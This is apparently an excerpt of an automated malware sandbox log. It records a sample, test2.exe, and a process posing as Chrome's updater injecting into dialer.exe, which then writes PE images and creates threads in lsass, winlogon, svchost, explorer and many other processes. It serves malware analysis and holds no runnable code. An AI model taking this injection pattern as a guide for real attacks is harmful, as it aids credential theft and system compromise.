      Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: E7492908
      Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: DE762908
      Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: 9C802908
      Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe EIP: 18342908
      Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: DFF72908
      Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: 22472908
      Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: 5E7A2908
      Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: 5B7A2908
      Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe EIP: 6DA42908
      Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe EIP: 93872908
      Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 4D502908
      Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: AA822908
      Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 5E912908
      Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: E4EA2908
      Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 21F12908
      Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 15DD2908
      Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: E74F2908
      Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: DE7C2908
      Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 9C862908
      Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 18CA2908
      Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: DFFD2908
      Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 224D2908
      Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 5E802908
      Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 5BE42908
      Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 6DAA2908
      Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 938D2908
      Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 135B2908
      Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 99672908
      Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 4EE32908
      Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 94FD2908
      Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 9E0F2908
      Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 99DB2908
      Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 41B42908
      Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 3C322908
      Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 92212908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 75662908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DFC52908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 36732908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B2B52908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 39512908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2F6F2908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 17C62908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: CA2908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C9BA2908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 50F12908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 60BD2908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7E5D2908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 36712908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 491D2908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A2602908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: EFFD2908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 35FB2908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 35F92908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: BFBC2908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A7AD2908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: ED522908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 9C902908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 354B2908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 19542908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 66572908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: BE2908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4BF52908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2C82908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 52292908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: BA832908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7EF92908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A852908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A7932908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: ED2A2908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7AF12908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FD652908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DB572908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 355A2908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8DF2908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FD032908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: E47D2908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 71A12908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 702908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 57E12908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DF762908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: EE062908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 199A2908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D1F12908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A7C32908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 28AC2908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C6562908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AD212908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: E9D52908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7E4F2908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7A0F2908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 63B12908
      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe EIP: FC422908
      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\conhost.exe EIP: 9CF32908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 55442908
      Source: C:\Program Files\Google\Chrome\updater.exe	NtAdjustPrivilegesToken: Direct from: 0x7FF62DCC723E
      Source: C:\Users\user\Desktop\test2.exe	NtQuerySystemInformation: Direct from: 0x7FF66154723E
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\winlogon.exe base: 2854D4A0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\lsass.exe base: 207A9DD0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1AD5DBD0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dwm.exe base: 1F5E4E40000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20C21EB0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21F155B0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F7E7490000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 248DE760000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2B79C800000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe base: 29418340000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 276DFF70000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 25C22470000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2D45E7A0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D05B7A0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe base: 1B66DA40000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe base: 20F93870000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 28813580000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\winlogon.exe base: 2854D500000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\lsass.exe base: 207AA820000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1AD5E910000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dwm.exe base: 1F5E4EA0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20C21F10000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21F15DD0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F7E74F0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 248DE7C0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2B79C860000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe base: 29418CA0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 276DFFD0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 25C224D0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2D45E800000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D05BE40000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe base: 1B66DAA0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe base: 20F938D0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 288135B0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 24099670000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23C4EE30000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CF94FD0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1859E0F0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E099DB0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20541B40000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A83C320000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23092210000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23375660000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21CDFC50000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23236730000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20BB2B50000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CE39510000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23C2F6F0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26A17C60000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\spoolsv.exe base: CA0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1EFC9BA0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DE50F10000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17660BD0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 11F7E5D0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20A36710000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 14F491D0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A0A2600000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\DriverStore\FileRepository\igcc_dch.inf_amd64_78ff17a5ea060c5f\OneApp.IGCC.WinService.exe base: 22BEFFD0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 18C35FB0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1EC35F90000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 210BFBC0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 231A7AD0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 281ED520000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\DriverStore\FileRepository\dal.inf_amd64_ffc75848a6342fdf\jhi_service.exe base: 1B29C900000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C3354B0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\sihost.exe base: 20219540000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26F66570000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe base: BE0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C74BF50000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 29902C80000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26C52290000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 1DFBA830000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C27EF90000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\explorer.exe base: A850000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxEM.exe base: 240A7930000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 183ED2A0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D37AF10000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\SettingSyncHost.exe base: 1FEFD650000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 27ADB570000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C4355A0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17708DF0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 1C0FD030000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 182E47D0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 21671A10000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe base: 700000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 15357E10000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 226DF760000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C5EE060000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 256199A0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BAD1F10000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 298A7C30000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E928AC0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1AEC6560000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 1CCAD210000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1F4E9D50000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 17E7E4F0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1947A0F0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Google\Chrome\updater.exe base: 2A663B10000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C7FC420000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1A49CF30000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 29C55440000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exe	Memory written: PID: 4992 base: A850000 value: 4D
      Source: C:\Users\user\Desktop\test2.exe	Section loaded: NULL target: C:\Windows\System32\dialer.exe protection: readonly
      Source: C:\Program Files\Google\Chrome\updater.exe	Section loaded: NULL target: C:\Windows\System32\dialer.exe protection: readonly
      Source: C:\Program Files\Google\Chrome\updater.exe	Section loaded: NULL target: unknown protection: readonly
      Source: C:\Program Files\Google\Chrome\updater.exe	Section loaded: NULL target: C:\Windows\System32\powercfg.exe protection: readonly
      Source: C:\Users\user\Desktop\test2.exe	Thread register set: target process: 1444
      Source: C:\Program Files\Google\Chrome\updater.exe	Thread register set: target process: 5060
      Source: C:\Program Files\Google\Chrome\updater.exe	Thread register set: target process: 7736
      Source: C:\Program Files\Google\Chrome\updater.exe	Thread register set: target process: 3188
      Source: C:\Users\user\Desktop\test2.exe	Memory written: C:\Windows\System32\dialer.exe base: E8A2DDC010
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\winlogon.exe base: 2854D4A0000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\lsass.exe base: 207A9DD0000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1AD5DBD0000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dwm.exe base: 1F5E4E40000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20C21EB0000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21F155B0000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F7E7490000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 248DE760000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2B79C800000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe base: 29418340000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 276DFF70000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 25C22470000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2D45E7A0000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D05B7A0000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe base: 1B66DA40000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe base: 20F93870000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 28813580000
      Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\backgroundTaskHost.exe base: 1F67D180000
      Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\backgroundTaskHost.exe base: 1F67D180000
      Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\backgroundTaskHost.exe base: 1F67D180000
      Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\backgroundTaskHost.exe base: 1F67D180000
      Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\backgroundTaskHost.exe base: 1F67D180000
      Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\backgroundTaskHost.exe base: 1F67D180000
      Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\backgroundTaskHost.exe base: 1F67D180000
      Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\backgroundTaskHost.exe base: 1F67D180000
      Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\backgroundTaskHost.exe base: 1F67D180000
      Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\backgroundTaskHost.exe base: 1F67D180000
      Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\backgroundTaskHost.exe base: 1F67D180000
      Source: C:\Program Files\Google\Chrome\updater.exe	Memory written: C:\Windows\System32\dialer.exe base: D66630D010
      Source: C:\Program Files\Google\Chrome\updater.exe	Memory written: C:\Windows\System32\dialer.exe base: C0FC850010
      Source: C:\Program Files\Google\Chrome\updater.exe	Memory written: C:\Windows\System32\dialer.exe base: 94DC2E8010
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\winlogon.exe base: 2854D500000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\lsass.exe base: 207AA820000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1AD5E910000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dwm.exe base: 1F5E4EA0000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20C21F10000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21F15DD0000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F7E74F0000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 248DE7C0000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2B79C860000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe base: 29418CA0000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 276DFFD0000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 25C224D0000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2D45E800000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D05BE40000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe base: 1B66DAA0000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe base: 20F938D0000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 288135B0000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 24099670000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23C4EE30000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CF94FD0000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1859E0F0000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E099DB0000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20541B40000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A83C320000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23092210000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23375660000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21CDFC50000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23236730000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20BB2B50000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CE39510000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23C2F6F0000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26A17C60000
